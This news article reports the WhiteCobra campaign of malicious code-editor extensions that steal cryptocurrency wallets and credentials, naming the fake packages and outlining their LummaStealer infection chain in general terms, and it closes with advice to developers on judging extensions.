The hacker collective WhiteCobra has launched a large-scale campaign targeting users of popular code editors including VS Code, Cursor, and Windsurf. Researchers at Koi Security uncovered 24 malicious extensions hosted on official repositories such as Visual Studio Marketplace and Open VSX. Although some were promptly removed, the attackers continue to upload new versions, keeping the operation alive and active.
One high-profile victim was Ethereum developer Zach Cole, whose cryptocurrency wallet was drained after installing the extension contractshark.solidity-lang for Cursor. The add-on appeared entirely legitimate, featuring a professional icon, a detailed description, and tens of thousands of downloads.
This convincing disguise allowed WhiteCobra to lure in a wide audience of unsuspecting developers. The same group had previously been linked to a July incident involving the theft of nearly half a million dollars in cryptocurrency through a fake Cursor extension.
The attack exploits a fundamental weakness in the ecosystem: the unified VSIX package format is used across multiple editors, while security checks for uploaded add-ons remain minimal. This enables threat actors to rapidly adapt and scale their campaigns.
According to Koi Security, each malicious extension mimics legitimate projects by copying their names and descriptions. Among the fraudulent packages identified were ChainDevTools.solidity-pro, kilocode-ai.kilo-code, nomic-fdn.hardhat-solidity, juan-blanco.solidity, Ethereum.solidity-ethereum, and many others, discovered on both Open VSX and the VS Code Marketplace.
From a technical standpoint, the malicious add-ons are deceptively simple. The core file, extension.js, largely mirrors the “Hello World” template but hides a call to another script, prompt.js. This script downloads the payload from Cloudflare Pages. On Windows systems, it delivers a PowerShell script that executes Python code, injects shellcode, and ultimately activates LummaStealer—a well-known infostealer designed to exfiltrate cryptocurrency wallets, browser extensions, saved credentials, and messenger conversations. On macOS, a Mach-O binary compiled for both ARM and Intel architectures loads a separate, as-yet-unclassified malware sample.
Investigators also obtained an internal WhiteCobra playbook, which outlines the group’s financial objectives, strategies for promoting fake extensions, and instructions for setting up command infrastructure. The documents suggest the group is highly organized, capable of launching new attack waves within just three hours of a takedown. Financial targets listed ranged from $10,000 to half a million per campaign cycle.
Experts warn that traditional trust indicators such as download counts, positive reviews, and star ratings can no longer be considered reliable markers of safety. These metrics are easily manipulated, while fake projects often impersonate established developers or organizations. Users are urged to scrutinize extensions carefully before installation, watch for suspicious naming overlaps, and remain cautious of projects that suddenly accumulate tens of thousands of downloads.
WhiteCobra’s operation starkly illustrates the vulnerabilities of the VS Code ecosystem and its compatible editors, where weak moderation enables malicious actors to pass off dangerous extensions as legitimate tools. For developers, this underscores the need for heightened vigilance, as even familiar work environments may conceal avenues for cryptocurrency theft and credential compromise.
